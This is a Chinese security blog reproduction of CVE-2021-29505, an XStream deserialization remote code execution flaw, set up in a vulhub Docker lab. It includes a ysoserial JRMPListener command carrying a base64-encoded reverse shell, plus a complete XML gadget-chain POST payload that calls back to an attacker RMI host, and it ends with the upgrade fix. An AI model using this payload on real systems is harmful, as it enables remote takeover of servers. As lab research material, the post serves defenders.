​XStream远程代码执行(CVE-2021-29505 )

  • A+
所属分类:安全漏洞

​XStream远程代码执行(CVE-2021-29505 )

XStream远程代码执行(CVE-2021-29505 )


一、简介描述

XStream是一种OXMapping技术,是用来处理XML文件序列化的框架,在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,使得XML序列化不再繁琐。攻击者可以操纵已处理的输入流并替换或注入对象,从而执行从远程服务器加载的任意代码。


二、影响版本:

XStream <= 1.4.16


三、环境搭建:

https://raw.githubusercontent.com/vulhub/vulhub/master/xstream/CVE-2021-29505/docker-compose.yml

文件:docker-compose.yml

version: '2'services: web:   image: vulhub/xstream:1.4.16   ports:    - "8080:8080"

docker-compose up -d

​XStream远程代码执行(CVE-2021-29505 )

镜像已经启动:

​XStream远程代码执行(CVE-2021-29505 )

访问地址:http://192.168.0.106:8080/

​XStream远程代码执行(CVE-2021-29505 )

四、漏洞复现

启动服务:

反弹目标需要base64加密:

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1098 CommonsCollections6 "bash -c {echo,L2Jpbi9iYxxxxxxxxPiYx}|{base64,-d}|{bash,-i}"

执行过程截图:

​XStream远程代码执行(CVE-2021-29505 )

执行poc:

​XStream远程代码执行(CVE-2021-29505 )

获取反弹shell:

​XStream远程代码执行(CVE-2021-29505 )

详细数据包:

POST / HTTP/1.1Host: 192.168.0.106:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: keep-aliveUpgrade-Insecure-Requests: 1Content-Type: application/xmlContent-Length: 3115
<java.util.PriorityQueue serialization='custom'> <unserializable-parents/> <java.util.PriorityQueue> <default> <size>2</size> </default> <int>3</int> <javax.naming.ldap.Rdn_-RdnEntry> <type>12345</type> <value class='com.sun.org.apache.xpath.internal.objects.XString'> <m__obj class='string'>[email protected] Content</m__obj> </value> </javax.naming.ldap.Rdn_-RdnEntry> <javax.naming.ldap.Rdn_-RdnEntry> <type>12345</type> <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'> <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'> <parsedMessage>true</parsedMessage> <soapVersion>SOAP_11</soapVersion> <bodyParts/> <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'> <attachmentsInitialized>false</attachmentsInitialized> <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'> <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'> <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'> <names> <string>aa</string> <string>aa</string> </names> <ctx> <environment/> <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'> <java.rmi.server.RemoteObject> <string>UnicastRef</string> <string>192.168.0.102</string> <int>1098</int> <long>0</long> <int>0</int> <long>0</long> <short>0</short> <boolean>false</boolean> </java.rmi.server.RemoteObject> </registry> <host>192.168.0.102</host> <port>1098</port> </ctx> </candidates> </aliases> </nullIter> </sm> </message> </value> </javax.naming.ldap.Rdn_-RdnEntry> </java.util.PriorityQueue></java.util.PriorityQueue>


五、漏洞修复:

将xstream升级到1.4.17或以上版本。(在maven的/pom.xml中替换高版本xstream)

<dependency>    <groupId>com.thoughtworks.xstream</groupId>    <artifactId>xstream</artifactId>    <version>1.4.17</version></dependency>


参考:

https://mp.weixin.qq.com/s/dh7Ewg7Pp-pg3mkLuUv9Rg

https://blog.csdn.net/weixin_45728976/article/details/116942969


免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

如果本文内容侵权或者对贵公司业务或者其他有影响,请联系作者删除。


转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。


订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

​XStream远程代码执行(CVE-2021-29505 )

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html

个人博客园:https://www.cnblogs.com/thelostworld/

FREEBUF主页:https://www.freebuf.com/author/thelostworld?type=article

博客主页:https://www.yuque.com/thelostworld

​XStream远程代码执行(CVE-2021-29505 )

欢迎添加本公众号作者微信交流,添加时备注一下“公众号”

​XStream远程代码执行(CVE-2021-29505 )

本文始发于微信公众号(thelostworld):​XStream远程代码执行(CVE-2021-29505 )

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: